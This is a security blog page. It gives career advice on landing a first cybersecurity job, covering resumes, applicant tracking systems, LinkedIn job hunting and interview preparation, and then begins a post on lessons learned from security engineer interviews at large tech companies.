Cyber Criminals: Security Research Blog, by Amit Sangra. Practical guide to landing your first CyberSec job as a fresh grad (published 2020-07-10)<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-siCJeIca8wA/XwKhmrhWfHI/AAAAAAAAATk/ulcBnN_HiAsLxZmoYFY8qUWEfQCI_WLhgCK4BGAsYHg/s700/looking-for-job-panhandle-tease-today.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="394" data-original-width="700" height="360" src="https://1.bp.blogspot.com/-siCJeIca8wA/XwKhmrhWfHI/AAAAAAAAATk/ulcBnN_HiAsLxZmoYFY8qUWEfQCI_WLhgCK4BGAsYHg/w640-h360/looking-for-job-panhandle-tease-today.jpg" width="640" /></a></div><div><br /></div><div>My plan to land my first cybersecurity job seemed a promising one: I just had to acquire cybersecurity skills and apply to my favourite company to get hired. It wasn't until I had applied to all the top companies on earth, moon & mars that I realized even getting shortlisted for an interview can be a daunting task. <br /></div><div><br /></div><div>This was back in January 2017. I was at complete rock bottom, had 0 offers in hand and knew nothing about job hunting. Fast forward 8 months, and I had at least 7 job offers in hand and was starting my career with a Big 4 auditing firm, but most importantly I had learnt the methods & principles required for a victorious job hunt. To this day I still use them to land interview opportunities with top companies such as Facebook, Microsoft, Amazon, HackerOne etc. 
<br /><br />Students come from different backgrounds and it is very difficult to generalize a job-hunting approach for everyone, so to cover the majority of strategies I will consider the approach from the perspective of a worst-case scenario: a candidate who can't get opportunities in cybersecurity through college placements and knows zero people in the industry who can give a reference.<br /><br /><span style="color: white;"><font size="5">The approach</font></span></div><div><font size="5"><br /></font></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8GKwJkz3Y_Q/XwboNukMAtI/AAAAAAAAAdc/8qaLCF4YcoUlWvd8TLinqL4iCfR8qGtJACK4BGAsYHg/s1796/Untitled%2BDocument-1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="721" data-original-width="1796" height="237" src="https://1.bp.blogspot.com/-8GKwJkz3Y_Q/XwboNukMAtI/AAAAAAAAAdc/8qaLCF4YcoUlWvd8TLinqL4iCfR8qGtJACK4BGAsYHg/w589-h237/Untitled%2BDocument-1.jpg" width="589" /></a></div><font size="5"><br /></font></div><div style="text-align: left;"><span style="color: white;"><font size="5">Decide the area of work & gain skills</font></span></div><div><br /></div><div>Going for a job hunt only makes sense if you have acquired sufficient skills for your desired role. You should do enough research about the types of roles you want to apply for and the requirements they have before starting your job hunt.</div><br />Most entry-level cybersecurity roles require general cybersecurity & computer science knowledge. 
Here's what a role looks like from a LinkedIn job search if I apply the filters <i>"Cyber Security Engineer | Experience: Entry Level"</i><div style="text-align: left;"><font size="5"><font size="3"><br /></font></font></div><div style="text-align: left;"><font size="5"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-duSBms7En54/XwaVjvTi_eI/AAAAAAAAAYw/YAk-KqtRMpsV0Lw3oYGlsJGbqPv69LxnQCK4BGAsYHg/s1180/Screenshot%2B2020-07-09%2Bat%2B11.56.41%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="890" data-original-width="1180" height="482" src="https://1.bp.blogspot.com/-duSBms7En54/XwaVjvTi_eI/AAAAAAAAAYw/YAk-KqtRMpsV0Lw3oYGlsJGbqPv69LxnQCK4BGAsYHg/w640-h482/Screenshot%2B2020-07-09%2Bat%2B11.56.41%2BAM.png" width="640" /></a></div></font><br /></div><div style="text-align: left;">Although it is not mandatory, it is a very good idea to select a specialized domain you want to pursue within cybersecurity early on; that way you can start building your profile around that area, and it will be easier for you to make career decisions once you move on from the trainee role. 
Some of the common domains are <a href="https://www.blogger.com/#">mentioned here</a>.<font size="5"><font size="3"><br /></font></font></div><div style="text-align: left;"><font size="5"><font size="3"><br /></font></font></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SosqZTe2vdo/Xwb5b0XXuQI/AAAAAAAAAd4/cNmpPi6upq4Dwde_1h3bs6cTl-6kWdFewCK4BGAsYHg/s1229/Screenshot%2B2020-07-09%2Bat%2B11.43.05%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="988" data-original-width="1229" height="514" src="https://1.bp.blogspot.com/-SosqZTe2vdo/Xwb5b0XXuQI/AAAAAAAAAd4/cNmpPi6upq4Dwde_1h3bs6cTl-6kWdFewCK4BGAsYHg/w640-h514/Screenshot%2B2020-07-09%2Bat%2B11.43.05%2BAM.png" width="640" /></a></div><div style="text-align: center;"><br /></div><font size="5"><span style="color: white;">Decide the type of companies you want to work for </span><br /></font></div><div><br /></div><div>In general, there are two types of companies: <b>Consulting</b> (Deloitte, EY, PwC) & <b>Product based</b> (Unilever, Boeing, Sony). In consulting firms you will typically work on short-term projects and get numerous opportunities to do a variety of work, whereas in product-based firms you will work on securing a single product or a handful of products, which will enable you to specialize in one domain and increase your depth of knowledge. (This is how things work in general, but don't be surprised if you experience something different.)</div><br /><div>With this you should also decide whether you would prefer working with startups & mid-size firms or with large-scale companies; the interview & job application process at these places is slightly different (we'll cover more later). 
No category of company is good or bad; the deciding factor should be the kind of work you prefer, which is personal to you.</div><br /><div style="text-align: left;"><span style="color: white;"><font size="5">Gain experience if you can</font></span></div><div style="text-align: left;"><br /></div><div style="text-align: left;">The good thing about internships is that the requirements are not that demanding and it's pretty easy to get one (unless you are applying at top companies); you just need to be aware of the opportunities floating around and apply at the right times.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This filter on LinkedIn jobs is the bare minimum you can do to look for opportunities. Just keep that Job Alerts button turned on.<br /></div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--G6eEI5gFuE/Xwa-mn1eqMI/AAAAAAAAAck/hyIjCMFAhusQyvEl7jfJeh4XoyYaEp4HACK4BGAsYHg/s1080/Screenshot%2B2020-07-09%2Bat%2B2.51.02%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="354" data-original-width="1080" height="131" src="https://1.bp.blogspot.com/--G6eEI5gFuE/Xwa-mn1eqMI/AAAAAAAAAck/hyIjCMFAhusQyvEl7jfJeh4XoyYaEp4HACK4BGAsYHg/w400-h131/Screenshot%2B2020-07-09%2Bat%2B2.51.02%2BPM.png" width="400" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><span style="color: white;"><font size="5">Prepare your resume</font></span><br /></div><div><br /></div><div>At the beginning of my career, I had the most visually appealing resume you would've ever seen, so good that it would put designers to shame. It was one of those enhancv/resumebuild.com resumes with pie charts, bar graphs etc. Guess how many jobs it landed me? . . . Zero. 
<br /></div><div><br /></div><div>There were 2 major reasons why that resume didn't perform well:</div><div><b><br /></b></div><div><span style="color: white;"><font size="5">Content:</font></span></div><div><br /></div><div>The same way painting your Toyota bright red won't make it a Ferrari, using great-looking templates won't make your resume top-notch (unless you are applying for a design role). Content is king and it will be the deciding factor in whether you get an interview opportunity or not. The wrong way to approach resume creation is to download a template and fill it with your details; the correct way is to decide the content you want to put in your resume and then select the template which best matches that content.</div><div><br /></div><div>To understand the basics of resume creation, here's a good resource: <a href="https://www.youtube.com/watch?v=BYUy1yvjHxE" target="_blank">Create Your Resume for Google: Tips and Advice</a>, and if you are ready to put in additional effort you should definitely read <a href="http://www.thegoogleresume.com/" target="_blank"><span class="st">The Google Résumé.</span></a></div><div><br /></div><div>To get you started, here are the key takeaways from these resources that will make your resume top-notch.</div><div><br /></div><div><b>#1 Focus on impact</b></div><div>Not every activity you did within cybersec is worth putting in your resume; when describing a task or project, always focus on the impact you had. How does <i>"I am an active bug bounty hunter"</i> sound vs <i>"As a bug bounty hunter I identified a high severity IDOR issue leaking the PII of over 1 million users"</i>?</div><div><br /></div><div><b>#2 Use action words</b><br />If you haven't heard about them before you should definitely <a href="https://www.thebalancecareers.com/action-verbs-and-power-words-for-your-resume-2063179" target="_blank">check this out</a>. But in a nutshell, action words demonstrate your strengths and put the focus on the impact you had. 
Achieved, Implemented and Collaborated are a few examples of action verbs.</div><div><br /></div><div><b>#3 Customize your resume based on the job description (the previously linked Google resume tips video describes this in more detail)</b></div><div><br /></div><div><b>#4 Describe with metrics & facts </b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-F-49hCsWIHA/XwcJRat9BjI/AAAAAAAAAeU/hOkGUo6CSlcUQapsfjhchzwRnoV-WT7awCK4BGAsYHg/s1024/Without-data-you-re-just-another-person-with-an-opinion..png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="156" src="https://1.bp.blogspot.com/-F-49hCsWIHA/XwcJRat9BjI/AAAAAAAAAeU/hOkGUo6CSlcUQapsfjhchzwRnoV-WT7awCK4BGAsYHg/s320/Without-data-you-re-just-another-person-with-an-opinion..png" width="156" /></a></div>You might have the best web app sec skills on the planet and just write "Has good knowledge about OWASP Top 10" on your resume. On the other hand, the candidate who started learning web apps yesterday will also write something similar.</div><div><br /></div><div>What differentiates your skills from others'? What reason did you give the recruiter to choose your profile for an interview over the others?</div><div><br /></div><div>Your skill set should be quantifiable, which gives a realistic idea of where you stand. For instance, I have this bullet point on my resume: <i>"Accomplished rank 32 in comparison to 400+ participants in Facebook CTF by completing web app security challenges"</i>. This isn't the best accomplishment in the world, but it draws a realistic picture of where my skill set lies compared with others. 
(If you had instances where you performed amazingly well you should definitely put them in, but if you don't, it won't hurt to put in your above-average performances.)<br /></div><div><br /></div><div>You will be surprised to know that employers are generous enough to understand that the skill set of a fresh grad can't be compared with that of an experienced professional, and they will consider above-average performance a good sign. (Tip: Wherever possible, use the formula <i>Accomplished [X] in comparison to [Y] by doing [Z]</i> to describe the activities you did; that way you make the activity measurable.)<div><br /></div><div><b>Additional Note: </b>If your career profile has some weak points like a tier 3 college, no internships, a non-cybersec degree etc., you should focus more on accomplishments; they can definitely fill the gaps. A few ideas for accomplishments you can gain: participate in a CTF, do a certification, present at reputed conferences, write a research paper, do bug bounties, contribute to open source cybersecurity projects, build something etc.<br /></div></div><div><b><br /></b></div><div><span style="color: white;"><font size="5">ATS Compatibility:</font></span></div><div><br /></div><div>If you haven't heard about ATS before and were having a hard time deciding the best graphical template for your resume, let me make it easier for you: during initial screening your recruiter won't even see your resume template. <br /></div><div><br /></div><div>Once you apply on a career portal, what happens in the background is that your resume is processed by an <a href="https://campustocareer.files.wordpress.com/2011/12/how_ats_reads_resume.png?w=491&h=1975" target="_blank">Applicant Tracking System</a>, which extracts the contents of your resume, scores it (on a scale of 1-100), and displays it in a nice dashboard.<br /></div><div><br /></div><div>Here's what your application looks like in the Workday ATS. 
(Notice how the content from the resume is populated into the dashboard.)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UH_POYza2ik/XwcLW7tXV5I/AAAAAAAAAew/W5S6iiToXOMV1yn9XssZ3AADJL3e0DWoACK4BGAsYHg/s1296/Screenshot%2B2020-07-06%2Bat%2B6.38.59%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1296" height="368" src="https://1.bp.blogspot.com/-UH_POYza2ik/XwcLW7tXV5I/AAAAAAAAAew/W5S6iiToXOMV1yn9XssZ3AADJL3e0DWoACK4BGAsYHg/w640-h368/Screenshot%2B2020-07-06%2Bat%2B6.38.59%2BPM.png" width="640" /></a></div><div><div><font size="2"><i>Note: Images are of low quality because I cropped them from a product demo video; I'll try to replace them once I find better ones.</i></font></div><div><br /></div></div><div>Another aspect is the scoring mechanism: all candidate resumes show up as a list sorted by score (high to low), and a recruiter will only screen the resumes on the first few pages, so if you score higher you have a better chance of getting screened. (Ever wondered why your application at Google never got reviewed?)</div><div><br /></div><div>Now your hacker mindset must be making you think about the <i>exploit.py</i>: how to score higher? 
Let me tell you, whatever ideas you have in mind will mostly be valid (using the same keywords as the job description, keyword frequency etc.), but don't get too caught up with this; resume screening is a very minor step in the interview process and you will eventually have to interact with real humans.</div><div><br /></div><div style="text-align: center;"><font size="2"><i>Scored & sorted resumes in Workday</i></font></div><div style="text-align: center;"><font size="2"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-6PBwc3CdU10/XwcL9Ww48NI/AAAAAAAAAfE/tr1dzXewDQcXL_f1lIY7GB3OLpW_ii1zwCK4BGAsYHg/s1640/Screenshot%2B2020-07-06%2Bat%2B6.37.15%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="758" data-original-width="1640" height="296" src="https://1.bp.blogspot.com/-6PBwc3CdU10/XwcL9Ww48NI/AAAAAAAAAfE/tr1dzXewDQcXL_f1lIY7GB3OLpW_ii1zwCK4BGAsYHg/w640-h296/Screenshot%2B2020-07-06%2Bat%2B6.37.15%2BPM.png" width="640" /></a></div><i><br /></i></font></div><div>Finally, a word of caution: visually impressive resume templates typically don't perform well with ATS. To show you a real example, I picked a template from the page #1 Google result for "Resume Builder" and scanned it with another page-one ATS; the results show that the ATS failed to parse the resume properly.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ruX5bExNXzY/XwXjUHeTX6I/AAAAAAAAAWM/faJJSnsBZXQLKVsNG-vDat5DN1neLY44QCK4BGAsYHg/s2442/Screenshot%2B2020-07-08%2Bat%2B11.13.06%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1128" data-original-width="2442" height="296" src="https://1.bp.blogspot.com/-ruX5bExNXzY/XwXjUHeTX6I/AAAAAAAAAWM/faJJSnsBZXQLKVsNG-vDat5DN1neLY44QCK4BGAsYHg/w640-h296/Screenshot%2B2020-07-08%2Bat%2B11.13.06%2BPM.png" width="640" /></a></div><div><br /></div><div>Because of this exact 
same problem, I've completely ditched visual resume templates. All I use is a plain Word doc with a couple of subheadings, bullet points, a white background and black font; it does not look as bad as you might think and gets parsed very well. For the example below I landed the interview by applying only through the career portal (no referrals). I won't call myself lucky to get shortlisted out of a couple thousand candidates; I did spend all that time learning about ATS :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--TFSdOIAaeY/XwXwIBTgktI/AAAAAAAAAXE/_0PrQyiNuN0jHRK_8hpdQozZh1BXMCvMgCK4BGAsYHg/s1590/Screenshot%2B2020-07-08%2Bat%2B11.59.25%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="884" data-original-width="1590" height="223" src="https://1.bp.blogspot.com/--TFSdOIAaeY/XwXwIBTgktI/AAAAAAAAAXE/_0PrQyiNuN0jHRK_8hpdQozZh1BXMCvMgCK4BGAsYHg/w400-h223/Screenshot%2B2020-07-08%2Bat%2B11.59.25%2BPM.png" width="400" /></a></div></div><div>Tip: A resume customized for a specific job description will appear more relevant to the recruiter and will also score higher within the ATS.</div><div><br /></div><div>To summarize, you should know the common pitfalls of graphical resume templates and try to strike a balance between making your resume human-readable and ATS-parsable. Once you have your resume prepared, try it against a couple of freely available ATS tools to see if it's parsable.<br /></div><div><br /></div><div><span style="color: white;"><font size="5">Start applying (Job hunting strategies)</font></span><br /><br /></div><div><b>#1 Applying via career portal:</b></div><div>This is the most obvious way to apply for a job. The things to note here are that the success rate of getting shortlisted by applying on the career portal of a large-scale firm is very low, and you need to care about ATS compatibility & score.</div><div><br /></div>In comparison, the success rate of getting shortlisted by small & mid-sized firms is pretty high (if you meet the job criteria) and you don't have to care much about ATS; since the volume of resumes they receive is low, they typically review all resumes manually.<br /><br />Also, wherever you apply, be ready to get ghosted; some companies might not send you a rejection email at all. If you don't hear back within a month or so, consider it a dead lead.<br /><div><br /><b>#2 Conferences & Career Fairs</b><br /></div><div>I never knew how amazing CyberSec conferences can be for getting job opportunities until I attended one. First of all, there will be plenty of companies with a trade booth where you can walk up and discuss career opportunities. I had an experience where a company was running a small CTF challenge; I performed well in it and later on discussed career opportunities. It went well and I got an interview. Don't believe me? 
Here's the POC.png <br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Kl6Rskx-tFs/Xwa2LJwtnWI/AAAAAAAAAbs/4HOTrJrC8DYxCm5AreEGH3IhvdMWRqsfQCK4BGAsYHg/s800/FB_IMG_1594091298136.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="800" height="400" src="https://1.bp.blogspot.com/-Kl6Rskx-tFs/Xwa2LJwtnWI/AAAAAAAAAbs/4HOTrJrC8DYxCm5AreEGH3IhvdMWRqsfQCK4BGAsYHg/w400-h400/FB_IMG_1594091298136.jpg" width="400" /></a></div><div><br /></div><div>Secondly, the open culture at these conferences gives you opportunities to interact with other people; you can make very good professional connections who can refer you to very good companies if you play your cards right (does my FireEye referral sound impressive enough to make you believe in this strategy?).<br /></div><div><br /></div><div><b>#3 LinkedIn Spam:</b></div><div>Remember how I told you to customize your resume for every job role? This method breaks all the rules we set earlier. During my job hunt I was asking every cybersec professional out there for opportunities and applying to all the job postings on LinkedIn. What I discovered was that the success rate of this approach is extremely low and it's not worth it. At one point I had applied to literally hundreds of open positions, and my inbox was so flooded with rejection emails that I mistakenly ignored the ones that wanted to proceed with my application, thinking they were just more rejection emails. 
:facepalm:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IjFg_Ty_uMw/Xwar3X8jt_I/AAAAAAAAAZM/l7fpn1ZmRBsCFAQsDHE8hTPIFFjUc_xVACK4BGAsYHg/s1668/Screenshot%2B2020-07-09%2Bat%2B1.30.39%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="853" data-original-width="1668" height="205" src="https://1.bp.blogspot.com/-IjFg_Ty_uMw/Xwar3X8jt_I/AAAAAAAAAZM/l7fpn1ZmRBsCFAQsDHE8hTPIFFjUc_xVACK4BGAsYHg/w400-h205/Screenshot%2B2020-07-09%2Bat%2B1.30.39%2BPM.png" width="400" /></a></div><div><br /></div><div>With that being said, it does not mean that this approach doesn't work; it's just that the approach is very aggressive & less productive. It's better to stick to the other strategies, which convert well.<br /></div><div><br /></div><div><b>#4 Applying via relevant job posts on LinkedIn:</b></div><div>This is probably the most productive approach of all; the strategy is to search for specific keywords on LinkedIn and find relevant entry-level roles.</div><div><br /></div>A search for the keyword <i>"we are hiring cybersecurity graduate"</i> leads me to the following post. These posts are usually created by hiring managers or recruiters and typically don't gain a lot of popularity. 
You will have to compete with another 15-30 candidates who also noticed the same post, which is a lot better than competing with a couple thousand on a job portal.<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tYhaeiIXW70/XwawLDxUmwI/AAAAAAAAAZo/QWTeV0hToj4dMN4UHaXtCsa75fj0Of9bwCK4BGAsYHg/s1668/Screenshot%2B2020-07-09%2Bat%2B1.48.47%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="994" data-original-width="1668" height="382" src="https://1.bp.blogspot.com/-tYhaeiIXW70/XwawLDxUmwI/AAAAAAAAAZo/QWTeV0hToj4dMN4UHaXtCsa75fj0Of9bwCK4BGAsYHg/w640-h382/Screenshot%2B2020-07-09%2Bat%2B1.48.47%2BPM.png" width="640" /></a></div><div><br /></div><div>Ever felt left out thinking about the fact that you know 0 people in the industry who can refer you to a company? Well, use the same strategy to get referrals. All you need to do is convince someone who is ready to refer that you have the matching skills for the role. <br /></div><div><br /></div><div>It worked well for me once I had already gained some experience, but it's doable even without any experience (great achievements in CyberSec can fill the gap).</div><div><br /></div><div>Note: You should definitely be qualified (or overqualified) when you ask a complete stranger to do you a favour and give you a referral. 
<br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/s1082/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="602" data-original-width="1082" height="358" src="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/w640-h358/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" width="640" /><br /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/s1082/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" style="margin-left: 1em; margin-right: 1em;"></a><a href="https://1.bp.blogspot.com/-mrFJ-nDTYjU/XwaygWc71wI/AAAAAAAAAaY/jmkY0H7z7foyoL3Mg2RmvQeuO1ZGbuQUACK4BGAsYHg/s1692/Screenshot%2B2020-07-09%2Bat%2B1.59.47%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1692" height="342" src="https://1.bp.blogspot.com/-mrFJ-nDTYjU/XwaygWc71wI/AAAAAAAAAaY/jmkY0H7z7foyoL3Mg2RmvQeuO1ZGbuQUACK4BGAsYHg/w640-h342/Screenshot%2B2020-07-09%2Bat%2B1.59.47%2BPM.png" width="640" /></a><a href="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/s1082/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" style="margin-left: 1em; margin-right: 1em;"></a></div><div><br /></div><div>Alice in the wonderland :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-XGsl6On0rtA/Xwa0zQg2bJI/AAAAAAAAAbM/Oj-McGu3O7sqNv1AcLSOFVXaS3cBKAOXQCK4BGAsYHg/s1290/Screenshot%2B2020-07-09%2Bat%2B2.09.32%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" 
data-original-width="1290" height="124" src="https://1.bp.blogspot.com/-XGsl6On0rtA/Xwa0zQg2bJI/AAAAAAAAAbM/Oj-McGu3O7sqNv1AcLSOFVXaS3cBKAOXQCK4BGAsYHg/w400-h124/Screenshot%2B2020-07-09%2Bat%2B2.09.32%2BPM.png" width="400" /></a></div><div><br /></div><div><b>#5 Passive Job Hunting</b><br /></div><div>This might sound counter-intuitive, but if you can build a good career profile you might not need to apply at all. All you need to do is put your accomplishments on LinkedIn, mention in the Title/Profile Pic/Job Preferences that you are open for work and stay a little active on LinkedIn.</div><div><br /></div><div>At least that's how I managed to get most of the interview opportunities, and a chance to work with the best manager ever :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-cSTe62hALWI/XwhXx64weUI/AAAAAAAAAfw/MR6gcxvvnvs3YxVetO4Vu-L5yPhsw9NQACK4BGAsYHg/s974/Screenshot%2B2020-07-09%2Bat%2B2.35.55%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="974" height="80" src="https://1.bp.blogspot.com/-cSTe62hALWI/XwhXx64weUI/AAAAAAAAAfw/MR6gcxvvnvs3YxVetO4Vu-L5yPhsw9NQACK4BGAsYHg/w400-h80/Screenshot%2B2020-07-09%2Bat%2B2.35.55%2BPM.png" width="400" /></a></div><div><br /></div><div><span style="color: white;"><font size="5">Prepare for the interview</font></span></div><div><br /></div><div>Typically the majority of companies have a technical cybersecurity round and a behavioural round (With exception to top tech firms, I explained their interview process <a href="https://www.cybercriminals.net/2020/07/i-interviewed-as-security-engineer-at.html" target="_blank">here in detail</a>)<br /></div><div><br /></div><div>You can check out <a href="https://medium.com/@krishna14u/my-experience-during-infosec-interviews-ed1f74ce41b8" target="_blank">this compilation of interview questions</a> to prepare for the technical round; you will 
probably get asked similar questions. And for the behavioural rounds, you will be evaluated based on your ability to work as a team, eagerness to learn new things & ability to resolve conflicts, you can <a href="https://www.youtube.com/watch?v=DINxNbBOEoI" target="_blank">check out this resource to get an idea about these kinds of interviews</a>.</div><div><br /></div><div><span style="color: white;"><font size="5">Evaluate & accept the offer</font></span></div><div><br /></div><div>While evaluating an offer you should always check <a href="https://www.glassdoor.com/Salaries/security-analyst-salary-SRCH_KO0,16.htm" target="_blank">Glassdoor</a> for a rough estimate about the median salary for your role in that specific area, if your offer is at the lower end of the range you can definitely negotiate. Also if you are in a situation where you have multiple offers from an almost similar type of companies your decision should be based on how compassionate your hiring manager is. Starting your career with an amazing manager will help you unlock great opportunities.<br /></div><div><br /></div><div><span style="color: white;"><font size="5">Doing the job</font></span></div><div><font size="5"><br /></font></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-kIrkjx_NReE/XwXzk2ItECI/AAAAAAAAAXg/cB3qtDV5SA4GFaN6NlheW6UB3NvFHLLmACK4BGAsYHg/s666/dogsheep.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="500" height="400" src="https://1.bp.blogspot.com/-kIrkjx_NReE/XwXzk2ItECI/AAAAAAAAAXg/cB3qtDV5SA4GFaN6NlheW6UB3NvFHLLmACK4BGAsYHg/w300-h400/dogsheep.jpg" width="300" /></a></div><div><br /></div><div>Finally, remember the <a href="https://www.youtube.com/watch?v=H14bBuluwB8" target="_blank">key to success is grit</a> and taking accountability of your own actions, you possess all the strength you need to make your own future. 
All the best with your job hunt :)</div><div><br /></div>Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com1tag:blogger.com,1999:blog-7421436727677135031.post-16567012231085184062020-07-02T02:30:00.000-07:002020-07-02T02:48:03.932-07:00I interviewed as a Security Engineer at tech giants, here's what I learnt<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-QxmGaBj4KlY/Xv2quMdSXuI/AAAAAAAAATI/eD3CYPJ8tI4vMX1SEF65TOBwlc3aNRQUwCPcBGAYYCw/s1600/GAFAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1200" height="320" src="https://1.bp.blogspot.com/-QxmGaBj4KlY/Xv2quMdSXuI/AAAAAAAAATI/eD3CYPJ8tI4vMX1SEF65TOBwlc3aNRQUwCPcBGAYYCw/s640/GAFAM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
It all started when I was still in university: I had developed a strong interest in web application security and aspired to get into one of the tech giants (the GAFAM companies), but it wasn't until I had already spent 2 years in the industry that I finally got a chance to interview at Microsoft, Amazon & Facebook.<br />
<br />
I had started my career doing bug bounties, and the positions I got interviews for were closely related to Web Application Security. To prepare for these interviews I made sure I knew every sophisticated payload out there; I even went to the extent of reading research papers to learn what more complex things I could do with very rare vulnerabilities such as RPO-based XSS.<br />
<br />
With those skills, I was pretty confident that I would be able to crack the interviews. Guess how those interviews went? I failed Microsoft in the screening round, and Amazon and Facebook in the onsite round. The interviews were completely different from the interviews I had done before; that was when I realized that I had made a lot of assumptions, and those led me to failure.<br />
<br />
I have compiled a list of the assumptions I had before interviewing at these companies and what I learnt from my failures. If you aspire to get into one of the GAFAM companies, you can definitely learn from my experiences and avoid making the same mistakes.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://preview.redd.it/fyuad9psesx21.jpg?width=960&crop=smart&auto=webp&s=d677cbbeaa6df9b6f04503f81e3f4f84ee9e3771" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="800" height="267" src="https://preview.redd.it/fyuad9psesx21.jpg?width=960&crop=smart&auto=webp&s=d677cbbeaa6df9b6f04503f81e3f4f84ee9e3771" width="640" /></a></div>
<br />
<br />
<h3 style="text-align: left;">
<span style="font-size: large;"><span style="color: white;">#1. I am interviewing for offensive security role, I do not need to know about defense</span></span></h3>
Even though you're interviewing for a pentester role, you will still be asked about vulnerability mitigation & remediation. Interviewing for an offensive security role is no excuse for not knowing about the defensive side of things, and vice versa.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#2. I need to know complex payloads & wizard level attack techniques</span></span></h4>
You'll almost never get interviewed on complex stuff... unless you bring it up. Your interviews will mostly consist of open-ended questions asked to explore your breadth & depth of knowledge.<br />
<br />
e.g., Question: How would you stop malicious bots from attacking your website? (Not an actual interview question)<br />
Answer: You can talk about the attacks originating from bot traffic: <a href="https://www.cloudflare.com/learning/bots/what-is-credential-stuffing/">credential stuffing</a>, <a href="https://www.cloudflare.com/learning/bots/what-is-data-scraping/">data scraping</a>, and <a href="https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/">DDoS attacks</a>. Then you could go in-depth and talk about the various types of DDoS attacks (an NTP-based amplified DDoS attack, for example, exploits the <i>monlist</i> command) & finally talk about how you would stop these attacks.<br />
<br />
If you answer in this way you show that you understand the different types of attacks (breadth of knowledge) and also the specific technicalities of each attack (depth of knowledge).<br />
<br />
To excel in these interviews it's better to build overall cyber security knowledge along with knowledge of the common vulnerabilities; being asked to come up with a payload to exploit a very rare vulnerability is not the norm.<br />
